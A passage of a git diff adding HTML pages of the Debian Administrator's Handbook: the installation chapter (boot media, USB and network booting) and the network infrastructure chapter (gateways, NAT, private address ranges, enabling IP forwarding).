+        xml:lang="cs-CZ"
+        class="chapter"
+        lang="cs-CZ"><div
+          class="titlepage"><div><div><h1
+                class="title"><a
+                  xmlns=""
+                  id="installation"></a>Kapitola 4. Installation</h1></div></div></div><div
+          class="toc"><dl
+            class="toc"><dt><span
+                class="section"><a
+                  href="installation.html#sect.installation-methods">4.1. Installation Methods</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="installation.html#sect.install-cd">4.1.1. Installing from a CD-ROM/DVD-ROM</a></span></dt><dt><span
+                    class="section"><a
+                      href="installation.html#sect.install-usb">4.1.2. Booting from a USB Key</a></span></dt><dt><span
+                    class="section"><a
+                      href="installation.html#sect.install-net">4.1.3. Installing through Network Booting</a></span></dt><dt><span
+                    class="section"><a
+                      href="installation.html#sect.install-auto">4.1.4. Other Installation Methods</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.installation-steps.html">4.2. Installing, Step by Step</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.installation-steps.html#sect.install-boot">4.2.1. Booting and Starting the Installer</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.installation-steps.html#sect.install-lang">4.2.2. Selecting the language</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.installation-steps.html#sect.install-country">4.2.3. Selecting the country</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.installation-steps.html#sect.install-keyboard">4.2.4. Selecting the keyboard layout</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.installation-steps.html#sect.install-detect-hardware">4.2.5. Detecting Hardware</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.installation-steps.html#sect.install-load-components">4.2.6. Loading Components</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.installation-steps.html#sect.install-detect-network">4.2.7. Detecting Network Hardware</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.installation-steps.html#sect.install-network-config">4.2.8. Configuring the Network</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.installation-steps.html#id-1.7.12.10">4.2.9. Administrator Password</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.installation-steps.html#id-1.7.12.11">4.2.10. Creating the First User</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.installation-steps.html#sect.install-clock-config">4.2.11. Configuring the Clock</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.installation-steps.html#sect.install-detect-disks">4.2.12. Detecting Disks and Other Devices</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.installation-steps.html#sect.install-partman">4.2.13. Starting the Partitioning Tool</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.installation-steps.html#id-1.7.12.15">4.2.14. Installing the Base System</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.installation-steps.html#id-1.7.12.16">4.2.15. Configuring the Package Manager (<code
+                        class="command">apt</code>)</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.installation-steps.html#id-1.7.12.17">4.2.16. Debian Package Popularity Contest</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.installation-steps.html#id-1.7.12.18">4.2.17. Selecting Packages for Installation</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.installation-steps.html#sect.installing-grub">4.2.18. Installing the GRUB Bootloader</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.installation-steps.html#id-1.7.12.20">4.2.19. Finishing the Installation and Rebooting</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.after-first-boot.html">4.3. After the First Boot</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.after-first-boot.html#id-1.7.13.5">4.3.1. Installing Additional Software</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.after-first-boot.html#id-1.7.13.6">4.3.2. Upgrading the System</a></span></dt></dl></dd></dl></div><div
+          class="highlights"><div
+            class="para">
+		To use Debian, you need to install it on a computer; this task is taken care of by the <span
+              class="emphasis"><em>debian-installer</em></span> program. A proper installation involves many operations. This chapter reviews them in their chronological order.
+	</div></div><a
+          id="id-1.7.4"
+          class="indexterm"></a><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>BACK TO BASICS</em></span> A catch-up course in the appendices</strong></p></div></div></div><div
+            class="para">
+		Installing a computer is always simpler when you are familiar with the way it works. If you are not, make a quick detour to <a
+              class="xref"
+              href="short-remedial-course.html">B – „<em>Short Remedial Course</em>“</a> before reading this chapter.
+	</div></div><div
+          class="para">
+		The installer for <span
+            class="distribution distribution">Stretch</span> is based on <code
+            class="command">debian-installer</code>. Its modular design enables it to work in various scenarios and allows it to evolve and adapt to changes. Despite the limitations implied by the need to support a large number of architectures, this installer is very accessible to beginners, since it assists users at each stage of the process. Automatic hardware detection, guided partitioning, and graphical user interfaces have solved most of the problems that newbies used to face in the early years of Debian.
+	</div><a
+          id="id-1.7.7"
+          class="indexterm"></a><a
+          id="id-1.7.8"
+          class="indexterm"></a><div
+          class="para">
+		Installation requires 128 MB of RAM (Random Access Memory) and at least 2 GB of hard drive space. All Falcot computers meet these criteria. Note, however, that these figures apply to the installation of a very limited system without a graphical desktop. A minimum of 512 MB of RAM and 10 GB of hard drive space are really recommended for a basic office desktop workstation.
+	</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>BEWARE</em></span> Upgrading from Jessie</strong></p></div></div></div><div
+            class="para">
+		If you already have Debian Jessie installed on your computer, this chapter is not for you! Unlike other distributions, Debian allows updating a system from one version to the next without having to reinstall the system. Reinstalling, in addition to being unnecessary, could even be dangerous, since it could remove already installed programs.
+	</div><div
+            class="para">
+		The upgrade process will be described in <a
+              class="xref"
+              href="sect.dist-upgrade.html">6.6 – „Upgrading from One Stable Distribution to the Next“</a>.
+	</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h2
+                  class="title"><a
+                    xmlns=""
+                    id="sect.installation-methods"></a>4.1. Installation Methods</h2></div></div></div><div
+            class="para">
+			A Debian system can be installed from several types of media, as long as the BIOS of the machine allows it. You can for instance boot with a CD-ROM, a USB key, or even through a network.
+		</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> BIOS, the hardware/software interface</strong></p></div></div></div><a
+              id="id-1.7.11.3.2"
+              class="indexterm"></a><a
+              id="id-1.7.11.3.3"
+              class="indexterm"></a><div
+              class="para">
+			BIOS (which stands for Basic Input/Output System) is a software that is included in the motherboard (the electronic board connecting all peripherals) and executed when the computer is booted, in order to load an operating system (via an adapted bootloader). It stays in the background to provide an interface between the hardware and the software (in our case, the Linux kernel).
+		</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="sect.install-cd"></a>4.1.1. Installing from a CD-ROM/DVD-ROM</h3></div></div></div><div
+              class="para">
+				The most widely used installation method is from a CD-ROM (or DVD-ROM, which behaves exactly the same way): the computer is booted from this media, and the installation program takes over.
+			</div><div
+              class="para">
+				Various CD-ROM families have different purposes: <span
+                class="emphasis"><em>netinst</em></span> (network installation) contains the installer and the base Debian system; all other programs are then downloaded. Its “image”, that is the ISO-9660 filesystem that contains the exact contents of the disk, only takes up about 150 to 280 MB (depending on architecture). On the other hand, the complete set offers all packages and allows for installation on a computer that has no Internet access; it requires around 14 DVD-ROMs (or 3 Blu-ray disks). There is no more official CD-ROMs set as they were really huge, rarely used and now most of the computers use DVD-ROMs as well as CD-ROMs. But the programs are divided among the disks according to their popularity and importance; the first disk will be sufficient for most installations, since it contains the most used softwares.
+			</div><div
+              class="para">
+				There is a last type of image, known as <code
+                class="filename">mini.iso</code>, which is only available as a by-product of the installer. The image only contains the minimum required to configure the network and everything else is downloaded (including parts of the installer itself, which is why those images tend to break when a new version of the installer is released). Those images can be found on the normal Debian mirrors under the <code
+                class="filename">dists/<em
+                  class="replaceable">release</em>/main/installer-<em
+                  class="replaceable">arch</em>/current/images/netboot/</code> directory.
+			</div><a
+              id="id-1.7.11.4.5"
+              class="indexterm"></a><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>TIP</em></span> Multi-architecture disks</strong></p></div></div></div><div
+                class="para">
+				Most installation CD- and DVD-ROMs work only with a specific hardware architecture. If you wish to download the complete images, you must take care to choose those which work on the hardware of the computer on which you wish to install them.
+			</div><div
+                class="para">
+				Some CD/DVD-ROM images can work on several architectures. We thus have a CD-ROM image combining the <span
+                  class="emphasis"><em>netinst</em></span> images of the <span
+                  class="emphasis"><em>i386</em></span> and <span
+                  class="emphasis"><em>amd64</em></span> architectures.
+			</div></div><a
+              id="id-1.7.11.4.7"
+              class="indexterm"></a><a
+              id="id-1.7.11.4.8"
+              class="indexterm"></a><a
+              id="id-1.7.11.4.9"
+              class="indexterm"></a><a
+              id="id-1.7.11.4.10"
+              class="indexterm"></a><div
+              class="para">
+				To acquire Debian CD-ROM images, you may of course download them and burn them to disk. You may also purchase them, and, thus, provide the project with a little financial support. Check the website to see the list of DVD-ROM image vendors and download sites. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://www.debian.org/CD/index.html">http://www.debian.org/CD/index.html</a></div>
+			</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="sect.install-usb"></a>4.1.2. Booting from a USB Key</h3></div></div></div><a
+              id="id-1.7.11.5.2"
+              class="indexterm"></a><div
+              class="para">
+				Since most computers are able to boot from USB devices, you can also install Debian from a USB key (this is nothing more than a small flash-memory disk).
+			</div><div
+              class="para">
+				The installation manual explains how to create a USB key that contains the <code
+                class="command">debian-installer</code>. The procedure is very simple because ISO images for i386 and amd64 are hybrid images that can boot from a CD-ROM as well as from a USB key.
+			</div><div
+              class="para">
+				You must first identify the device name of the USB key (ex: <code
+                class="literal">/dev/sdb</code>); the simplest means to do this is to check the messages issued by the kernel using the <code
+                class="command">dmesg</code> command. Then you must copy the previously downloaded ISO image (for example debian-9.0.0-amd64-netinst.iso) with the command <code
+                class="command">cat debian-9.0.0-amd64-netinst.iso &gt;/dev/sdb; sync</code>. This command requires administrator rights, since it accesses the USB key directly and blindly erases its content.
+			</div><div
+              class="para">
+				A more detailed explanation is available in the installation manual. Among other things, it describes an alternative method of preparing a USB key that is more complex, but that allows to customize the installer's default options (those set in the kernel command line). <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://www.debian.org/releases/stable/amd64/ch04s03.html">http://www.debian.org/releases/stable/amd64/ch04s03.html</a></div>
+			</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="sect.install-net"></a>4.1.3. Installing through Network Booting</h3></div></div></div><a
+              id="id-1.7.11.6.2"
+              class="indexterm"></a><a
+              id="id-1.7.11.6.3"
+              class="indexterm"></a><a
+              id="id-1.7.11.6.4"
+              class="indexterm"></a><div
+              class="para">
+				Many BIOSes allow booting directly from the network by downloading a kernel and a minimal filesystem image. This method (which has several names, such as <acronym
+                class="acronym">PXE</acronym> or <acronym
+                class="acronym">TFTP</acronym> boot) can be a life-saver if the computer does not have a CD-ROM reader, or if the BIOS can't boot from such media.
+			</div><div
+              class="para">
+				This installation method works in two steps. First, while booting the computer, the BIOS (or the network card) issues a BOOTP/DHCP request to automatically acquire an IP address. When a BOOTP or DHCP server returns a response, it includes a filename, as well as network settings. After having configured the network, the client computer then issues a TFTP (Trivial File Transfer Protocol) request for a file whose name was previously indicated. Once this file is acquired, it is executed as though it were a bootloader. This then launches the Debian installation program, which is executed as though it were running from the hard drive, a CD-ROM, or a USB key.
+			</div><div
+              class="para">
+				All the details of this method are available in the installation guide (“Preparing files for TFTP Net Booting” section). <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://www.debian.org/releases/stable/amd64/ch05s01.html#boot-tftp">http://www.debian.org/releases/stable/amd64/ch05s01.html#boot-tftp</a></div> <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://www.debian.org/releases/stable/amd64/ch04s05.html">http://www.debian.org/releases/stable/amd64/ch04s05.html</a></div>
+			</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="sect.install-auto"></a>4.1.4. Other Installation Methods</h3></div></div></div><div
+              class="para">
+				When we have to deploy customized installations for a large number of computers, we generally choose an automated rather than a manual installation method. Depending on the situation and the complexity of the installations to be made, we can use FAI (Fully Automatic Installer, described in <a
+                class="xref"
+                href="sect.automated-installation.html#sect.fai">12.3.1 – „Fully Automatic Installer (FAI)“</a>), or even a customized installation DVD with preseeding (see <a
+                class="xref"
+                href="sect.automated-installation.html#sect.d-i-preseeding">12.3.2 – „Preseeding Debian-Installer“</a>).
+			</div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.how-to-migrate.html"><strong>Předcházející</strong>3.2. How To Migrate</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.installation-steps.html"><strong>Další</strong>4.2. Installing, Step by Step</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/network-infrastructure.html b/publish/cs-CZ/Debian/9/html/debian-handbook/network-infrastructure.html
new file mode 100644
index 000000000..f707fe4f9
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/network-infrastructure.html
@@ -0,0 +1,299 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">Kapitola 10. Network Infrastructure</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Network, Gateway, TCP/IP, IPv6, DNS, Bind, DHCP, QoS" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="prev"
+        href="sect.power-management.html"
+        title="9.12. Power Management: Advanced Configuration and Power Interface (ACPI)" /><link
+        rel="next"
+        href="sect.virtual-private-network.html"
+        title="10.2. Virtual Private Network" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/network-infrastructure.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.power-management.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.virtual-private-network.html"><strong>Další</strong></a></li></ul><div
+        xml:lang="cs-CZ"
+        class="chapter"
+        lang="cs-CZ"><div
+          class="titlepage"><div><div><h1
+                class="title"><a
+                  xmlns=""
+                  id="network-infrastructure"></a>Kapitola 10. Network Infrastructure</h1></div></div></div><div
+          class="toc"><dl
+            class="toc"><dt><span
+                class="section"><a
+                  href="network-infrastructure.html#sect.gateway">10.1. Gateway</a></span></dt><dt><span
+                class="section"><a
+                  href="sect.virtual-private-network.html">10.2. Virtual Private Network</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.virtual-private-network.html#sect.openvpn">10.2.1. OpenVPN</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.virtual-private-network.html#sect.ssh-vpn">10.2.2. Virtual Private Network with SSH</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.virtual-private-network.html#sect.ipsec">10.2.3. IPsec</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.virtual-private-network.html#sect.pptp">10.2.4. PPTP</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.quality-of-service.html">10.3. Quality of Service</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.quality-of-service.html#sect.qos-principe">10.3.1. Principle and Mechanism</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.quality-of-service.html#sect.qos-config">10.3.2. Configuring and Implementing</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.dynamic-routing.html">10.4. Dynamic Routing</a></span></dt><dt><span
+                class="section"><a
+                  href="sect.ipv6.html">10.5. IPv6</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.ipv6.html#sect.ipv6-tunneling">10.5.1. Tunneling</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.domain-name-servers.html">10.6. Domain Name Servers (DNS)</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.domain-name-servers.html#sect.dns-principe">10.6.1. Principle and Mechanism</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.domain-name-servers.html#sect.dns-config">10.6.2. Configuring</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.dhcp.html">10.7. DHCP</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.dhcp.html#sect.dhcp-config">10.7.1. Configuring</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.dhcp.html#sect.dhcp-dns">10.7.2. DHCP and DNS</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.network-diagnosis-tools.html">10.8. Network Diagnosis Tools</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.network-diagnosis-tools.html#sect.netstat">10.8.1. Local Diagnosis: <code
+                        class="command">netstat</code></a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.network-diagnosis-tools.html#sect.nmap">10.8.2. Remote Diagnosis: <code
+                        class="command">nmap</code></a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.network-diagnosis-tools.html#sect.sniffers">10.8.3. Sniffers: <code
+                        class="command">tcpdump</code> and <code
+                        class="command">wireshark</code></a></span></dt></dl></dd></dl></div><div
+          class="highlights"><div
+            class="para">
+		Linux sports the whole Unix heritage for networking, and Debian provides a full set of tools to create and manage them. This chapter reviews these tools.
+	</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h2
+                  class="title"><a
+                    xmlns=""
+                    id="sect.gateway"></a>10.1. Gateway</h2></div></div></div><div
+            class="para">
+			A gateway is a system linking several networks. This term often refers to a local network's “exit point” on the mandatory path to all external IP addresses. The gateway is connected to each of the networks it links together, and acts as a router to convey IP packets between its various interfaces.
+		</div><a
+            id="id-1.13.4.3"
+            class="indexterm"></a><a
+            id="id-1.13.4.4"
+            class="indexterm"></a><a
+            id="id-1.13.4.5"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> IP packet</strong></p></div></div></div><a
+              id="id-1.13.4.6.2"
+              class="indexterm"></a><div
+              class="para">
+			Most networks nowadays use the IP protocol (<span
+                class="emphasis"><em>Internet Protocol</em></span>). This protocol segments the transmitted data into limited-size packets. Each packet contains, in addition to its payload data, a number of details required for its proper routing.
+		</div></div><div
+            class="sidebar"><a
+              xmlns=""
+              id="sidebar.tcp-udp"></a><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> TCP/UDP</strong></p></div></div></div><a
+              id="id-1.13.4.7.2"
+              class="indexterm"></a><a
+              id="id-1.13.4.7.3"
+              class="indexterm"></a><a
+              id="id-1.13.4.7.4"
+              class="indexterm"></a><a
+              id="id-1.13.4.7.5"
+              class="indexterm"></a><div
+              class="para">
+			Many programs do not handle the individual packets themselves, even though the data they transmit does travel over IP; they often use TCP (<span
+                class="emphasis"><em>Transmission Control Protocol</em></span>). TCP is a layer over IP allowing the establishment of connections dedicated to data streams between two points. The programs then only see an entry point into which data can be fed with the guarantee that the same data exits without loss (and in the same sequence) at the exit point at the other end of the connection. Although many kinds of errors can happen in the lower layers, they are compensated by TCP: lost packets are retransmitted, and packets arriving out of order (for example, if they used different paths) are re-ordered appropriately.
+		</div><div
+              class="para">
+			Another protocol relying on IP is UDP (<span
+                class="emphasis"><em>User Datagram Protocol</em></span>). In contrast to TCP, it is packet-oriented. Its goals are different: the purpose of UDP is only to transmit one packet from an application to another. The protocol does not try to compensate for possible packet loss on the way, nor does it ensure that packets are received in the same order as were sent. The main advantage to this protocol is that the latency is greatly improved, since the loss of a single packet does not delay the receiving of all following packets until the lost one is retransmitted.
+		</div><div
+              class="para">
+			TCP and UDP both involve ports, which are “extension numbers” for establishing communication with a given application on a machine. This concept allows keeping several different communications in parallel with the same correspondent, since these communications can be distinguished by the port number.
+		</div><div
+              class="para">
+			Some of these port numbers — standardized by the IANA (<span
+                class="emphasis"><em>Internet Assigned Numbers Authority</em></span>) — are “well-known” for being associated with network services. For instance, TCP port 25 is generally used by the email server. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://www.iana.org/assignments/port-numbers">http://www.iana.org/assignments/port-numbers</a></div>
+		</div></div><div
+            class="para">
+			When a local network uses a private address range (not routable on the Internet), the gateway needs to implement <span
+              class="emphasis"><em>address masquerading</em></span> so that the machines on the network can communicate with the outside world. The masquerading operation is a kind of proxy operating on the network level: each outgoing connection from an internal machine is replaced with a connection from the gateway itself (since the gateway does have an external, routable address), the data going through the masqueraded connection is sent to the new one, and the data coming back in reply is sent through to the masqueraded connection to the internal machine. The gateway uses a range of dedicated TCP ports for this purpose, usually with very high numbers (over 60000). Each connection coming from an internal machine then appears to the outside world as a connection coming from one of these reserved ports.
+		</div><a
+            id="id-1.13.4.9"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CULTURE</em></span> Private address range</strong></p></div></div></div><a
+              id="id-1.13.4.10.2"
+              class="indexterm"></a><a
+              id="id-1.13.4.10.3"
+              class="indexterm"></a><div
+              class="para">
+			RFC 1918 defines three ranges of IPv4 addresses not meant to be routed on the Internet but only used in local networks. The first one, <code
+                class="literal">10.0.0.0/8</code> (see sidebar <a
+                class="xref"
+                href="sect.network-config.html#sidebar.networking-basics"><span
+                  class="emphasis"><em>BACK TO BASICS</em></span> Essential network concepts (Ethernet, IP address, subnet, broadcast)</a>), is a class-A range (with 2<sup>24</sup> IP addresses). The second one, <code
+                class="literal">172.16.0.0/12</code>, gathers 16 class-B ranges (<code
+                class="literal">172.16.0.0/16</code> to <code
+                class="literal">172.31.0.0/16</code>), each containing 2<sup>16</sup> IP addresses. Finally, <code
+                class="literal">192.168.0.0/16</code> is a class-B range (grouping 256 class-C ranges, <code
+                class="literal">192.168.0.0/24</code> to <code
+                class="literal">192.168.255.0/24</code>, with 256 IP addresses each). <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://www.faqs.org/rfcs/rfc1918.html">http://www.faqs.org/rfcs/rfc1918.html</a></div>
+		</div></div><div
+            class="para">
+			The gateway can also perform two kinds of <span
+              class="emphasis"><em>network address translation</em></span> (or NAT for short). The first kind, <span
+              class="emphasis"><em>Destination NAT</em></span> (DNAT) is a technique to alter the destination IP address (and/or the TCP or UDP port) for a (generally) incoming connection. The connection tracking mechanism also alters the following packets in the same connection to ensure continuity in the communication. The second kind of NAT is <span
+              class="emphasis"><em>Source NAT</em></span> (SNAT), of which <span
+              class="emphasis"><em>masquerading</em></span> is a particular case; SNAT alters the source IP address (and/or the TCP or UDP port) of a (generally) outgoing connection. As for DNAT, all the packets in the connection are appropriately handled by the connection tracking mechanism. Note that NAT is only relevant for IPv4 and its limited address space; in IPv6, the wide availability of addresses greatly reduces the usefulness of NAT by allowing all “internal” addresses to be directly routable on the Internet (this does not imply that internal machines are accessible, since intermediary firewalls can filter traffic).
+		</div><a
+            id="id-1.13.4.12"
+            class="indexterm"></a><a
+            id="id-1.13.4.13"
+            class="indexterm"></a><a
+            id="id-1.13.4.14"
+            class="indexterm"></a><a
+            id="id-1.13.4.15"
+            class="indexterm"></a><a
+            id="id-1.13.4.16"
+            class="indexterm"></a><a
+            id="id-1.13.4.17"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> Port forwarding</strong></p></div></div></div><a
+              id="id-1.13.4.18.2"
+              class="indexterm"></a><div
+              class="para">
+			A concrete application of DNAT is <span
+                class="emphasis"><em>port forwarding</em></span>. Incoming connections to a given port of a machine are forwarded to a port on another machine. Other solutions may exist for achieving a similar effect, though, especially at the application level with <code
+                class="command">ssh</code> (see <a
+                class="xref"
+                href="sect.remote-login.html#sect.ssh-port-forwarding">9.2.1.3 – „Creating Encrypted Tunnels with Port Forwarding“</a>) or <code
+                class="command">redir</code>.
+		</div></div><div
+            class="para">
+			Enough theory, let's get practical. Turning a Debian system into a gateway is a simple matter of enabling the appropriate option in the Linux kernel, by way of the <code
+              class="filename">/proc/</code> virtual filesystem:
+		</div><pre
+            class="screen">
+<code
+              class="computeroutput"># </code><strong
+              class="userinput"><code>echo 1 &gt; /proc/sys/net/ipv4/conf/default/forwarding</code></strong></pre><div
+            class="para">
+			This option can also be automatically enabled on boot if <code
+              class="filename">/etc/sysctl.conf</code> sets the <code
+              class="literal">net.ipv4.conf.default.forwarding</code> option to <code
+              class="literal">1</code>.
+		</div><div
+            class="example"><a
+              xmlns=""
+              id="example.sysctl.conf"></a><p
+              class="title"><strong>Příklad 10.1. The <code
+                  class="filename">/etc/sysctl.conf</code> file</strong></p><div
+              class="example-contents"><pre
+                class="programlisting">
+net.ipv4.conf.default.forwarding = 1
+net.ipv4.conf.default.rp_filter = 1
+net.ipv4.tcp_syncookies = 1
+</pre></div></div><div
+            class="para">
+			The same effect can be obtained for IPv6 by simply replacing <code
+              class="literal">ipv4</code> with <code
+              class="literal">ipv6</code> in the manual command and using the <code
+              class="literal">net.ipv6.conf.all.forwarding</code> line in <code
+              class="filename">/etc/sysctl.conf</code>.
+		</div><div
+            class="para">
+			Enabling IPv4 masquerading is a slightly more complex operation that involves configuring the <span
+              class="emphasis"><em>netfilter</em></span> firewall.
+		</div><div
+            class="para">
+			Similarly, using NAT (for IPv4) requires configuring <span
+              class="emphasis"><em>netfilter</em></span>. Since the primary purpose of this component is packet filtering, the details are listed in <a
+              class="xref"
+              href="security.html">14: „<em>Security</em>“</a> (see <a
+              class="xref"
+              href="sect.firewall-packet-filtering.html">14.2 – „Firewall or Packet Filtering“</a>).
+		</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.power-management.html"><strong>Předcházející</strong>9.12. Power Management: Advanced Configuration an...</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.virtual-private-network.html"><strong>Další</strong>10.2. Virtual Private Network</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/network-services.html b/publish/cs-CZ/Debian/9/html/debian-handbook/network-services.html
new file mode 100644
index 000000000..c02ef8369
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/network-services.html
@@ -0,0 +1,1151 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">Kapitola 11. Network Services: Postfix, Apache, NFS, Samba, Squid, LDAP, SIP, XMPP, TURN</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Postfix, Apache, NFS, Samba, Squid, OpenLDAP, SIP" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="prev"
+        href="sect.network-diagnosis-tools.html"
